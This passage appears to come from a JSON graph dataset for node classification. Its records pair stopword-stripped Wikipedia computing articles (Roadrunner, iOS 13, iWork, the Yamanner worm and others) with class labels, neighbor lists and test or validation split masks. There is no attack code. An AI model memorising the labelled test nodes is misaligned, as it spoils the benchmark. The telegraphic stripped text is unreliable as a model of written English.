    "text": "Dat_(software):dat software dat data distribution tool version control feature tracking changes publishing data sets primarily used data-driven science used keep track changes data set distributed revision control system aimed speed simplicity security support distributed non-linear workflows dat created max ogden 2013 standardize way data analysts collaborate changes make data sets developed dat team funding support code science john s. james l. knight foundation alfred p. sloan foundation dat free software distributed terms revised bsd license 3-clause one main implementations beaker web browser seamlessly handles dat // urls allows building seeding dat websites homebase server-side permanent seeding tool dat",
    "neighbors": [
      4229,
      3462,
      4490,
      11029,
      3350,
      534,
      10522,
      5026,
      3366,
      7983,
      823,
      3770,
      8640,
      11073,
      708,
      6351,
      3792,
      6991,
      7761,
      5085,
      3428,
      3813,
      9320,
      7921,
      1908,
      4725,
      5749,
      9332
    ],
    "mask": "None"
  },
  {
    "node_id": 3677,
    "label": 3,
    "text": "Roadrunner_(supercomputer):roadrunner supercomputer roadrunner supercomputer built ibm los alamos national laboratory new mexico usa us 100-million roadrunner designed peak performance 1.7 petaflops achieved 1.026 petaflops may 25 2008 become world first top500 linpack sustained 1.0 petaflops system november 2008 reached top performance 1.456 petaflops retaining top spot top500 list also fourth-most energy-efficient supercomputer world supermicro green500 list operational rate 444.94 megaflops per watt power used hybrid roadrunner design reused several energy efficient supercomputers roadrunner decommissioned los alamos march 31 2013 place los alamos commissioned supercomputer called cielo installed 2010 cielo smaller energy efficient roadrunner cost 54 million ibm built computer u.s. department energy doe national nuclear security administration hybrid design 12,960 ibm powerxcell 8i 6,480 amd opteron dual-core processors specially designed blade servers connected infiniband roadrunner used red hat enterprise linux along fedora operating systems managed xcat distributed computing software also used open mpi message passing interface implementation roadrunner occupied approximately 296 server racks covered became operational 2008 decommissioned march 31 2013 doe used computer simulating nuclear materials age order predict whether usa aging arsenal nuclear weapons safe reliable uses roadrunner included science financial automotive aerospace industries roadrunner differed contemporary supercomputers continued hybrid approach supercomputer design introduced seymour cray 1964 control data corporation cdc 6600 continued order magnitude faster cdc 7600 1969 however architecture peripheral processors used operating system functions applications ran one central processor previous supercomputers used one processor architecture since thought easier design program realize full potential roadrunner software written specially hybrid architecture hybrid design consisted dual-core opteron server processors manufactured amd using standard amd64 architecture attached opteron core ibm-designed -fabricated powerxcell 8i processor supercomputer roadrunner considered opteron cluster cell accelerators node consists cell attached opteron core opterons roadrunner development 2002 went online 2006 due novel design complexity constructed three phases became fully operational 2008 predecessor machine also developed los alamos named dark horse machine one earliest hybrid architecture systems originally based arm moved cell processor entirely 3d design design integrated 3d memory networking processors number technologies first phase roadrunner building standard opteron based cluster evaluating feasibility construct program future hybrid version phase 1 roadrunner reached 71 teraflops full operation los alamos national laboratory 2006 phase 2 known aais advanced architecture initial system included building small hybrid version finished system using older version cell processor phase used build prototype applications hybrid architecture went online january 2007 goal phase 3 reach sustained performance excess 1 petaflops additional opteron nodes new powerxcell processors added design powerxcell processors five times powerful cell processors used phase 2 built full scale ibm ’ poughkeepsie new york facility broke 1 petaflops barrier fourth attempt may 25 2008 complete system moved permanent location new mexico summer 2008 roadrunner used two different models processors first amd opteron 2210 running 1.8 ghz opterons used computational nodes feeding cells useful data system operations communication nodes passing data computing nodes helping operators running system roadrunner total 6,912 opteron processors 6,480 used computation 432 operation opterons connected together hypertransport links opteron two cores total 13,824 cores second processor ibm powerxcell 8i running 3.2 ghz processors one general purpose core ppe eight special performance cores spe floating point operations roadrunner total 12,960 powerxcell processors 12,960 ppe cores 103,680 spe cores total 116,640 cores logically triblade consists two dual-core opterons 16 gb ram four powerxcell 8i cpus 16 gb cell ram physically triblade consists one ls21 opteron blade expansion blade two qs22 cell blades ls21 two 1.8 ghz dual-core opterons 16 gb memory whole blade providing 8gb cpu qs22 two powerxcell 8i cpus running 3.2 ghz 8 gb memory makes 4 gb cpu expansion blade connects two qs22 via four pcie x8 links ls21 two links qs22 also provides outside connectivity via infiniband 4x ddr adapter makes total width four slots single triblade three triblades fit one bladecenter h chassis expansion blade connected opteron blade via hypertransport connected unit 60 bladecenter h full triblades 180 triblades triblades connected 288-port voltaire isr2012 infiniband switch cu also access panasas file system twelve system x3755 servers cu system information final cluster made 18 connected units connected via eight additional second-stage infiniband isr2012 switches cu connected twelve uplinks second-stage switch makes total 96 uplink connections overall system information ibm roadrunner shut march 31 2013 supercomputer one fastest world energy efficiency relatively low roadrunner delivered 444 megaflops per watt vs 886 megaflops per watt comparable supercomputer supercomputer dismantled researchers spend one month performing memory data routing experiments aid designing future supercomputers ibm roadrunner dismantled electronics shredded los alamos perform majority supercomputer destruction citing classified nature calculations parts retained historical purposes",
    "neighbors": [
      9472,
      643,
      7812,
      1933,
      10780,
      9762,
      6311,
      7983,
      306,
      10675,
      6072,
      9277,
      1985,
      8899,
      6597,
      1480,
      9932,
      3025,
      6738,
      1115,
      859,
      11618,
      9445,
      4587,
      1776,
      6004,
      1784,
      3323,
      6909
    ],
    "mask": "Test"
  },
  {
    "node_id": 3678,
    "label": 7,
    "text": "Popular_Power:popular power popular power company founded january 2000 sold distributed computing software cpu scavenging company led marc hedlund ceo nelson minar cto popular power worker software downloadable java-based application internet users could install onto computers allowed users computers participate non-profit project develop influenza vaccine although popular power able raise 1.6 million angel round funding unable close venture capital needed continue result permanently shut operations march 2001",
    "neighbors": [
      3449,
      6421
    ],
    "mask": "None"
  },
  {
    "node_id": 3679,
    "label": 3,
    "text": "Ali_Baba_and_40_Thieves_(video_game):ali baba 40 thieves video game ali baba 40 thieves maze arcade game released sega 1982 players take role famous arabian hero must fend kill forty thieves trying steal money game based folk tale name ported msx platform vector-06c port made based msx version clone sinclair zx spectrum published suzy soft 1985 name ali baba",
    "neighbors": [
      1776,
      10931,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 3680,
    "label": 3,
    "text": "Cycle_stealing:cycle stealing computing traditionally cycle stealing method accessing computer memory ram bus without interfering cpu similar direct memory access dma allowing i/o controllers read write ram without cpu intervention clever exploitation specific cpu bus timings permit cpu run full speed without delay external devices access memory actively participating cpu current activity complete operations possible cpu conflict systems nearly dual-port ram without expense high speed ram systems halt cpu steal essentially making form dma another name example system separate instruction data memory banks allow external devices one memory access data bank cpu fetching instruction instruction bank accesses initiated simultaneously memory management unit essential example zilog z80 m1 line used distinguish instruction data access cpu reading instruction instruction-ram rom data ram available devices without interfering cpu processing cycle stealing difficult achieve modern systems due many factors pipelining pre-fetch concurrent elements constantly accessing memory leaving predictable idle times sneak memory access dma formal predictable method external devices access ram term less common modern computer architecture 66-100 mhz various external buses controllers generally run different rates cpu internal operations longer closely coupled i/o bus operations unexpected cycle stealing rendezvous radar descent nearly caused apollo 11 landing aborted design apollo guidance computer allowed landing continue dropping low-priority tasks ibm 1130 cycle steal really dma cpu clock stopped memory access several i/o controllers access ram way self-arbitrate via fixed priority scheme controllers deliberately pace ram access minimize impact system ability run instructions others graphic video adapters operate higher speed may slow system cycle-stealing concept 1130 permits cpu program start operation i/o device continue mainline program i/o device performing operation i/o device operates manner takes steals cycle cpu needed cpu tied one cycle data character transferred frequency devices steal cycles depends type device since cpu much faster i/o device system cpu may performing another function arithmetic time i/o operation performed fact several i/o operations may overlapped cpu functions cycle stealing cause major performance degradation machine sinclair ql economy reasons video ram dual access consequently m68008 cpu denied access memory bus zx8301 master controller accessing memory machine performed poorly compared machines using similar processors similar speeds",
    "neighbors": [
      664,
      8523,
      3936,
      9599
    ],
    "mask": "Test"
  },
  {
    "node_id": 3681,
    "label": 2,
    "text": "IOS_13:ios 13 ios 13 thirteenth major release ios mobile operating system developed apple inc. successor ios 12 announced company worldwide developers conference june 3 2019 scheduled released september 2019. ios 13 ipados 13 introduced software engineering director craig federighi apple worldwide developers conference keynote address june 3 2019 first beta made available registered developers following keynote second beta available registered developers june 18 2019 first public beta released june 24 2019 public releases ios 13 ipados 13 expected made available fall 2019. ios 13 contains changes handling location data app requests access location user choose whether grant access whenever using app user also receive similar prompts background location access app requests access bluetooth wi-fi august 2019 reported beginning april 2020 pushkit api voip restricted internet telephony usage closing loophole used apps background data collection system-wide dark mode implemented allowing users enable light-on-dark color scheme entire ios ipados user interface native applications well supported third-party apps manually turned set automatically switch light dark modes based time day ios 13 introduces updated volume indicator appears left side screen opposed previous versions indicator located center screen user slide finger volume indicator change system volume siri uses software-generated voice called neural tts instead using clips human voices allow siri sound natural siri also become functional new sound control available siri shortcuts app installed default siri also use homepods learn recognize voices different people also possible siri read messages aloud quicktype virtual keyboard features quickpath allowing user swipe finger across keyboard complete words phrases functionality previously exclusively available via certain third-party keyboard applications swiftkey gboard emoji stickers included emoji keyboard available use anywhere regular emoji input new systemwide gesture interface added cut copy paste undo redo ios 13 ipados 13 three-finger swipe left undo three fingers right redo single three-finger pinch copy second three-finger pinch cut three-finger spread pastes three-finger single tap bring shortcut menu five options blue text cursor moved around text fields pressing holding pick move many new options text selection also added – double tapping word select triple tapping selects sentence quadruple tapping paragraph selects new single sign-on implementation known sign apple implemented allowing users create accounts third-party services minimal amount information users option generate disposable email address site improving privacy anonymity reduces amount information associated single email address ios applications support third-party login methods facebook google must support sign apple system ios human interface guidelines recommend developers place sign apple option login methods several improvements performance ios13 implemented face id iphone x xs xs max iphone xr unlocks devices 30percent faster ios12 app downloads 50percent smaller due new format app updates 60percent smaller version ios available ipad devices renamed ipados noting platform functionality differences compared ios iphone ipod touch ios13 adds official support sony dualshock 4 microsoft xbox one controller ios13 also adds support wireless audio sharing airpods certain beats headphones new multi-select gesture available supported applications files mail multiple items files emails quickly selected dragging two fingers desired items user profiles created memoji used imessage profile picture ios devices a9 processor newer create custom memoji memoji animoji used sticker imessage apps also available regular emoji use anywhere emoji keyboard available variety new customization options memoji maps app features redesigned maps ui featuring detailed maps look around street level imagery implementation similar google street view redesigned rebuilt ground new features ability suggest reminder delivered user ability tag contacts references reminders surfaced elsewhere messages photos app includes redesigned ui uses machine learning auto-hide clutter images screenshots documents photos redesigned interface showing users photos took past year month week day bringing photos one page showing photos based device suggests ios13 drops support several devices including devices apple a8 chip earlier devices 1gb ram also marks first time 64-bit devices dropped devices longer supported ios13 include iphone 5s iphone 6 6 plus sixth-generation ipod touch differentiate features iphones ipads ios 13 specific iphone ipod touch apple rebranded tablet oriented platform operating system ipados",
    "neighbors": [
      10755,
      9732,
      1549,
      4111,
      5647,
      7697,
      11289,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      8767,
      576,
      5696,
      8774,
      8783,
      4180,
      10838,
      1623,
      3672,
      9308,
      3167,
      9826,
      8806,
      3691,
      2673,
      7292,
      2686,
      6783,
      10878,
      5784,
      1177,
      3228,
      2207,
      10406,
      11430,
      3241,
      2735,
      3248,
      4283,
      3772,
      7869,
      7378,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      6377,
      9451,
      1772,
      4844,
      10478,
      5363,
      7928,
      8441,
      11513,
      7420,
      1290,
      3338,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      10052,
      7496,
      4957,
      6495,
      9063,
      3948,
      10608,
      2439,
      6023,
      6539,
      7052,
      7057,
      1428,
      3483,
      2979,
      9123,
      11171,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      8662,
      9174,
      10199,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      7154,
      5619,
      11257,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 3682,
    "label": 0,
    "text": "Jussi_Karlgren:jussi karlgren jussi karlgren swedish computational linguist adjunct professor kth co-founder text analytics company gavagai ab holds phd computational linguistics stockholm university title docent adjoint professor language technology helsinki university jussi karlgren known pioneered application computational linguistics stylometry continued work bringing non-topical features text attention information access research field karlgren research focused questions relating information access genre stylistics distributional pragmatics evaluation information access applications distributional models karlgren half finnish descent fluent finnish",
    "neighbors": [
      1890,
      10452
    ],
    "mask": "Test"
  },
  {
    "node_id": 3683,
    "label": 9,
    "text": "Yamanner:yamanner yamanner worm computer worm written javascript targeted vulnerability yahoo mail service released june 12 2006 worm spread yahoo system infecting systems opened e-mails sending user address book remote server",
    "neighbors": [
      803,
      3462,
      2041,
      7515,
      8735
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3684,
    "label": 2,
    "text": "PacBSD:pacbsd pacbsd formerly known arch bsd operating system based arch linux uses freebsd kernel instead linux kernel gnu userland pacbsd project began arch linux forum thread april 2012 aims provide arch-like user environment utilizing openrc init system pacman package manager rolling-release",
    "neighbors": [
      10016,
      5067,
      5356,
      7983,
      4978,
      5363,
      5397,
      11573,
      7483,
      9151
    ],
    "mask": "Test"
  },
  {
    "node_id": 3685,
    "label": 2,
    "text": "HandyLinux:handylinux handylinux linux distribution originating france derived debian stable branch designed especially inexperienced computer users mind distribution low system requirements allowing used range older hardware longer supported latest versions proprietary operating systems aimed particularly older people dated hardware need possess skill use many features afforded state-of-the-art operating systems may also useful computer users disabilities visually impaired goal handylinux project provide stable debian-based os elderly novices people seeking freedom full functionality user-friendly desktop handylinux official debian derivative simple clear graphical user interface called handymenu features built-in tools facilitate handling home computing documentation teaches users desktop navigation helps learn handylinux distribution prospective users encouraged browse handylinux online forum ask questions operating system handylinux installed modern computer processor pentium 4 higher 512 mb ram system requires 3.7 gb available hard drive storage distribution run either two live versions live cd handylinuxlight live usb sample prepackaged software test compatibility installed hardware alternatively installed netbook equipped least 4 gb memory computers built 2005 handylinux i486 non pae computers built 2005 onward handylinux i686-pae choose users remove castors i.e. remove default handymenu substitute classical menu xfce desktop environment add software packages customize look feel distribution becoming experienced os reading documentation software needed functional desktop included disk image internet connection necessary install program bundle prepackaged handylinux operating system tools integrated improving accessibility inverter color filter screen direct access documentation screen magnifier copy paste button virtual keyboard voice synthesis integrated browser small practical programs also included screenshot calendar file search automatic sorting download folder bleachbit cleaning archive manager archive manager disk utility formatting hardinfo system information xl-wallpaper wallpaper changer handylinux native desktop environment based xfce compiz compositing window manager optional users may switch traditional xfce menu prefer handymenu seven-tab menu large computer icon enables users graphically launch applications single click necessary open files folders run program handylinux updates generally follow updates debian stable branch development fork handylinux finnish language published may 29 2014",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      4637,
      543,
      11297,
      7204,
      9253,
      11305,
      5681,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      3649,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      9324,
      10860,
      5742,
      2671,
      11388,
      1150,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      708,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      6371,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      5369,
      6393,
      8957,
      4355,
      7431,
      7435,
      2321,
      6934,
      4887,
      8476,
      8992,
      10016,
      10530,
      6436,
      2853,
      3369,
      7983,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      5962,
      2383,
      9048,
      8033,
      2914,
      5990,
      9064,
      4459,
      7020,
      7534,
      11121,
      9074,
      7027,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10687,
      10694,
      4039,
      7626,
      5067,
      975,
      5078,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      8180,
      5110,
      3068,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 3686,
    "label": 4,
    "text": "Cryptographic_splitting:cryptographic splitting cryptographic splitting also known cryptographic bit splitting cryptographic data splitting technique securing data computer network technique involves encrypting data splitting encrypted data smaller data units distributing smaller units different storage locations encrypting data new location process data protected security breaches even intruder able retrieve decrypt one data unit information would useless unless combined decrypted data units locations technology filed patent consideration june 2003 patent granted june 2008 cryptographic splitting utilizes combination different algorithms provide data protection block data first encrypted using aes-256 government encryption standard encrypted bits split different shares share hashed using national security agency sha-256 algorithm one application cryptographic splitting provide security cloud computing encrypted data subsets stored different clouds information required restore data held private cloud additional security security vendor security first corp uses technology secure parser extended spx product line 2009 technology services company unisys gave presentation using cryptographic splitting storage area networks splitting data different parts storage area network technique provided data redundancy addition security computer giant ibm written using technology part cloud data encryption services icdes technology also written context effectively using sensitive corporate information entrusting different individuals within company trustees different parts information",
    "neighbors": [
      4194,
      1415,
      7887,
      3323,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3687,
    "label": 1,
    "text": "Australasian_Virtual_Herbarium:australasian virtual herbarium australasian virtual herbarium avh online resource allows access plant specimen data held various australian new zealand herbaria part atlas living australia ala formed amalgamation australia virtual herbarium nz virtual herbarium 12 august 2014 five million specimens 8 million upwards specimens available participating institutions databased resource used academics students anyone interested research botany australia new zealand since record tells known specimen collected current identification together botanist identified information habitat associated species ala post processes original herbarium data giving fields respect taxonomy quality data interrogating individual specimen records environmental overlays show reverse jackknife testing see whether specimen outlier respect climate environmental layers see e.g. mel 0304065a scaevola amblyanthera records downloadable entirety anyone examples use records may found google scholar search using phrase australia virtual herbarium shows well 200 articles 3 may 2018 published using data resource herbaria codes may found wikipedia list herbaria based new york botanical garden continuously updated index plans australia virtual herbarium announced 2001 article tim entwisle 2003 shows still largely planning stage time although projected usages preservation biodiversity western new south wales already visible",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 3688,
    "label": 8,
    "text": "Web_traffic:web traffic web traffic amount data sent received visitors website necessarily include traffic generated bots since mid-1990s web traffic largest portion internet traffic determined number visitors number pages visit sites monitor incoming outgoing traffic see parts pages site popular apparent trends one specific page viewed mostly people particular country many ways monitor traffic gathered data used help structure sites highlight security problems indicate potential lack bandwidth web traffic welcomed companies offer advertising schemes return increased web traffic visitors pay screen space site also fake traffic bot traffic generated third party type traffic damage website reputation visibility google overall domain authority sites also often aim increase web traffic inclusion search engines search engine optimization web analytics measurement behavior visitors website commercial context especially refers measurement aspects website work towards business objectives internet marketing initiatives example landing pages encourage people make purchase notable vendors web analytics software services include google analytics ibm digital analytics formerly coremetrics adobe omniture web traffic measured see popularity websites individual pages sections within site done viewing traffic statistics found web server log file automatically generated list pages served hit generated file served page considered file images also files thus page 5 images could generate 6 hits 5 images page page view generated visitor requests page within website – visitor always generate least one page view main page could generate many tracking applications external website record traffic inserting small piece html code every page website web traffic also sometimes measured packet sniffing thus gaining random samples traffic data extrapolate information web traffic whole across total internet usage following types information often collated monitoring web traffic websites produce traffic rankings statistics based people access sites using toolbars means online measurements difficulty look complete traffic picture site large sites usually hire services companies nielsen netratings quantcast reports available subscription amount traffic seen website measure popularity analysing statistics visitors possible see shortcomings site look improve areas also possible increase popularity site number people visit sometimes important protect parts site password allowing authorized people visit particular sections pages site administrators chosen block page specific traffic geographic location re-election campaign site u.s. president george w. bush georgewbush.com blocked internet users outside u.s. 25 october 2004 reported attack site also possible limit access web server based number connections bandwidth expended connection apache http servers accomplished limitipconn module others majority website traffic driven search engines millions people use search engines every day research various topics buy products go daily surfing activities search engines use keywords help users find relevant information major search engines developed unique algorithm determine websites placed within search results user clicks one listings search results directed corresponding website data transferred website server thus counting visitors towards overall flow traffic website search engine optimization seo ongoing practice optimizing website help improve rankings search engines several internal external factors involved help improve site listing within search engines higher site ranks within search engines particular keyword traffic receive web traffic increased placement site search engines purchase advertising including bulk e-mail pop-up ads in-page advertisements web traffic also increased purchasing web traffic providers experts delivering targeted traffic however buying traffic past seen many websites penalized search engines web traffic increased attracting visitors site also encouraging individual visitors linger site viewing many pages visit see outbrain example practice web page listed first pages search odds someone finding diminishes greatly especially competition first page people go past first page percentage go subsequent pages substantially lower consequently getting proper placement search engines practice known seo important website itself.. much web traffic dramatically slow prevent access website caused file requests going server handle may intentional attack site simply caused over-popularity large-scale websites numerous servers often cope traffic required likely smaller services affected traffic overload sudden traffic load may also hang server may result shutdown services denial-of-service attacks dos attacks forced websites close malicious attack flooding site requests could cope viruses also used coordinate large-scale distributed denial-of-service attacks sudden burst publicity may accidentally cause web traffic overload news item media quickly propagating email link popular site may cause boost visitors sometimes called flash crowd slashdot effect according mozilla since january 2017 half web traffic encrypted https according estimates cited interactive advertising bureau 2014 around one third web traffic generated internet bots malware",
    "neighbors": [
      10636,
      9233,
      5524,
      7828,
      9878,
      1943,
      8983,
      7965,
      5150,
      9768,
      170,
      6576,
      8630,
      11319,
      7739,
      444,
      8639,
      5442,
      8914,
      10713,
      7515,
      735,
      2661,
      3941,
      2409,
      235,
      10604,
      9325,
      4725,
      2806,
      2552
    ],
    "mask": "None"
  },
  {
    "node_id": 3689,
    "label": 4,
    "text": "Internal_Security_Assessor:internal security assessor internal security assessor isa designation given pci security standards council eligible internal security audit professionals working qualifying organization intent qualification individuals receive pci dss training qualifying organization better understanding pci dss impacts company becoming isa improve relationship qualified security assessors support consistent proper application pci dss measures controls within organization pci ssc secure portal used verify isa employees isa also able perform self-assessments organization long level 1 merchant isa training available merchants processors organizations required internal audit department affiliated qualified security assessor automated scanning vendor asv company way isa certification must renewed annually isa certification company specific certified individual leaves company sponsored certification longer valid good news longer required complete onsite training requalifying isa training currently costs 1,095 includes training modules exam individual successfully completes exam receive renewed certificate qualification",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 3690,
    "label": 7,
    "text": "Zoho_Office_Suite:zoho office suite zoho web-based online office suite containing word processing spreadsheets presentations databases note-taking wikis web conferencing customer relationship management crm project management invoicing applications developed zoho corporation formerly adventnet inc. california-based company launched 2005 web-based word processor additional products spreadsheets presentations incorporated later zoho zoho applications distributed software service saas zoho uses open application programming interface writer sheet show creator meeting planner products also plugins microsoft word excel openoffice.org plugin plugin firefox zoho sites online drag drop website builder provides web hosting unlimited storage bandwidth web pages features also include array website templates mobile websites zoho crm customer relationship management application features like procurement inventory accounting functions realm erp free version limited 10 users october 2009 zoho integrated applications google apps online suite enabled users sign suites one login zoho google still remain separate competing companies",
    "neighbors": [
      9347,
      3691,
      9772,
      11372,
      467,
      2901,
      5078,
      2328,
      1817,
      2046
    ],
    "mask": "Test"
  },
  {
    "node_id": 3691,
    "label": 7,
    "text": "IWork:iwork iwork office suite applications created apple inc. macos ios operating systems also available cross-platform icloud website includes keynote presentation program word processing desktop publishing application pages spreadsheet application numbers generally viewed prosumer office suite targeted home small business users fewer features competitors microsoft office mac open source libreoffice project indeed earlier versions simpler user interface strong touchscreen support built-in links apple icloud document-hosting service aperture iphoto image management applications apple design goals creating iwork allow mac users easily create attractive documents spreadsheets making use macos extensive font library integrated spelling checker sophisticated graphics apis applescript automation framework equivalent microsoft office applications pages numbers keynote word excel powerpoint respectively although microsoft office applications open iwork documents iwork applications export documents native formats .pages .numbers .key microsoft office formats .docx .xlsx .pptx etc well pdf files oldest application iwork keynote first released standalone application 2003 pages released first iwork release 2005 numbers added 2007 release iwork '08 next release iwork '09 also included access iwork.com beta service allowed users upload share documents integrated apple icloud service ios port released 2010 first ipad regularly updated since 2013 apple released new os x version iwork icloud set cross-platform web applications replicating native software versions iwork initially sold suite 79 later 19.99 per app os x 9.99 per app ios apple announced october 2013 ios devices purchased september 2013 onwards os x computers purchased october 2013 onwards whether new refurbished eligible free download three iwork apps iwork icloud also incorporates document hosting service free holders icloud account april 2017 released suite free macos ios september 2016 apple announced real-time collaboration feature available iwork apps first version iwork iwork '05 announced january 11 2005 macworld conference expo made available january 22 united states worldwide january 29. iwork '05 comprised two applications keynote 2 presentation creation program pages word processor iwork '05 sold us 79 30-day trial also made available download apple website originally igg software held rights name iwork iwork billed apple successor appleworks replicate appleworks database drawing tools however iwork integrates existing applications apple ilife suite media browser allows users drag drop music itunes movies imovie photos iphoto aperture directly iwork documents iwork '06 released january 10 2006 contained updated versions keynote pages programs released universal binaries first time allowing run natively powerpc processors intel processors used new imac desktop computers macbook pro notebooks announced day new iwork suite next version suite iwork '08 announced released august 7 2007 special media event apple campus cupertino california iwork '08 like previous updates contained updated versions keynote pages new spreadsheet application numbers also introduced numbers differed spreadsheet applications including microsoft excel allowed users create documents containing multiple spreadsheets flexible canvas using number built-in templates iwork '09 announced january 6 2009 released day contains updated versions three applications suite iwork '09 also included access beta version iwork.com service allowed users share documents online service decommissioned end july 2012 users iwork '09 could upload document directly pages keynote numbers invite others view online viewers could write notes comments document download copy iwork microsoft office pdf formats iwork '09 also released mac app store january 6 2011 19.99 per application received regular updates point including links icloud high-dpi version designed match apple macbook pro retina display january 27 2010 apple announced iwork ipad available three separate 9.99 applications app store version also received regular updates including version pocket iphone ipod touch devices update take advantage retina display devices larger screens recent iphones october 22 2013 apple announced overhaul iwork software mac ios suites made available via respective app stores update free current iwork owners also made available free charge anyone purchasing os x ios device october 1 2013 user activating newly free iwork apps qualifying device download apps another ios os x device logged app store account new os x versions criticized losing features multiple selection linked text boxes bookmarks 2-up page views mail merge searchable comments ability read/export rtf files default zoom page count integration applescript apple provided road-map feature re-introduction stating hopes reintroduce missing features within next six months april 1 2014 features—e.g. ability set default zoom—had reintroduced though scores october 2014 writer john gruber commented numerous font handling problems like 're back 1990 due using completely new file format work across macos windows web browsers using online icloud web apps means versions iwork beginning iwork 13 later open allow editing documents created versions prior iwork 09 users attempt open older iwork files given pop-up new iwork 13 app versions telling use previous iwork 09 users may may machine order open edit files accordingly current version os x initially compatible os x mavericks 10.9 onwards moves previously installed iwork 09 apps iwork 09 folder users machine codice_1 work-around allow users continued use earlier suite order open edit older iwork documents locally machine october 2015 apple released update mitigate issue allowing users open documents saved iwork '06 iwork '08 formats latest version pages 2016 apple announced real-time collaboration feature available iwork apps instead constrained using iwork icloud feature comparable google docs iwork '09 received several updates mac app store version iwork updated october 15 2015 10.10 yosemite newer final release support 10.10 yosemite 10.11 el capitan keynote 6.6 pages 5.6 numbers 3.6 included iwork received major update march 28 2019 keynote 9.0 pages 8.0 numbers 6.0 products iwork suite share number components largely result sharing underlying code cocoa similar shared application programming interfaces apis among well known universal multilingual spell checker also found products like safari mail grammar checking find replace style color pickers similar examples design features found throughout apple application space moreover applications iwork suite also share new model document document-based applications particular data type forms basis application view world instance word processors text first-class citizen application spreadsheet cells table objects images charts instance managed attached referenced underlying primary data type iwork applications share common underlying document format canvas generic container type provides layout storage mechanisms application adds custom objects places canvas pages instance conventionally opens single large text object canvas user appears typical word processor grab corner re-size page layout application numbers one initially sees grid cells like spreadsheet user free size smaller canvas add multiple grids charts even drawings canvas difference subtle many features also implemented traditional programs like microsoft excel however difference ui significant excel instance charts stored part sheet moved inadvertently natural user actions numbers charts like everything else part canvas changes sheet normally independent iwork model bears resemblance earlier apple effort opendoc opendoc also used single underlying document engine along single on-disk format unlike iwork however opendoc also used single application various editors could invoked instance one could open generic document start spreadsheet editor add spreadsheet iwork lacks level flexibility editing terms maintains layout pages word processing application besides basic word processing functionality pages includes templates designed apple allow users create various types documents including newsletters invitations stationery résumés along number education-themed templates students teachers reports outlines pages 5 complete redesign removed 100 features pages 4.x including bookmarks mail merge linked text boxes multiple section capability ability set default zoom slowly adding back subsequent 5.x releases default zoom example set still linked text boxes multiple select mail merge book marks 90 features present version 4.3 along keynote numbers pages integrates apple ilife suite using media browser users drag drop movies photos music directly documents within pages application full screen view hides menubar toolbars outline mode allows users quickly create outlines easily rearranged dragging dropping well collapsed expanded pages includes support entering complex equations mathtype 6 reference citing using endnote x2 pages application open edit microsoft word documents including doc office open xml files plain text documents pages 5 longer read export rich text format documents pages also export documents doc pdf epub formats read write opendocument file formats word-processing application targeted towards creating attractive documents range applications lesson plans newsletters pages competes microsoft word microsoft publisher never ported os x apple free e-book pdf authoring application ibooks author adobe professional-market desktop publishing application indesign keynote application used create play presentations features comparable microsoft powerpoint though keynote contains several unique features keynote like pages numbers integrates ilife application suite users drag drop media imovie itunes iphoto aperture directly keynote presentations using media browser keynote contains number templates transitions effects magic move allows users apply simple transitions automatically animate images text repeated consecutive slides apple formerly released keynote remote application ios let users view slides presenter notes control keynote presentations iphone ipod touch wi-fi network functionality rolled subsequent releases main keynote ios application keynote supports number file formats default presentations saved .key files keynote open edit microsoft powerpoint .ppt files addition presentations exported microsoft powerpoint files quicktime movies also playable ipod iphone html files pdf files presentations also sent directly idvd itunes garageband iweb youtube keynote 09 file format backward compatible .key files saved keynote '09 opened earlier versions keynote numbers spreadsheet application added iwork suite 2007 release iwork '08 numbers like microsoft excel spreadsheet applications lets users organize data tables perform calculations formulas create charts graphs using data entered spreadsheet numbers however differs spreadsheet applications allows users create multiple tables single document flexible canvas many prebuilt templates including ones designed personal finance education business use included numbers 2.0 included iwork '09 several improvements charts pasted keynote pages automatically updated across documents changed numbers additionally numbers 2 lets users categorize data tables column collapsed summarized numbers 3.6 added ability open numbers '08 spreadsheets among things iwork.com free service enabled users share iwork '09 documents online directly within pages keynote numbers users could click iwork.com toolbar icon login using apple id upload document invite others view online viewers could leave comments notes document download copy iwork microsoft office pdf formats document owners could track comments iwork.com website released public beta january 6 2009 macworld conference expo iwork.com service provides web interface viewing downloading commenting uploaded documents contrast cloud-based office applications google docs office online offer editing iwork.com supported uploading pages '09 documents keynote '09 presentations numbers '09 spreadsheets users could download documents microsoft office pdf formats addition native iwork formats uploading documents iwork.com requires copy iwork '09 software suite apple id viewing commenting downloading require web browser invitation view document apple announced july 31 2012 users longer able publish new documents iwork.com iwork application documents stored iwork.com available download view shut date instead users use icloud share documents computers running os x mountain lion ios devices users attempting access iwork.com site re-directed apple homepage 2013 apple worldwide developers conference wwdc keynote speech iwork icloud announced release time next version app versions iwork later year three apps ios os x form apple iwork suite pages numbers keynote made available web interface named pages icloud numbers icloud keynote icloud respectively accessed via icloud website users icloud apple id login also sync users ios os x versions app via icloud apple id later 2013 iwork icloud update added support real-time collaboration document could opened collaborators time everyone could make changes 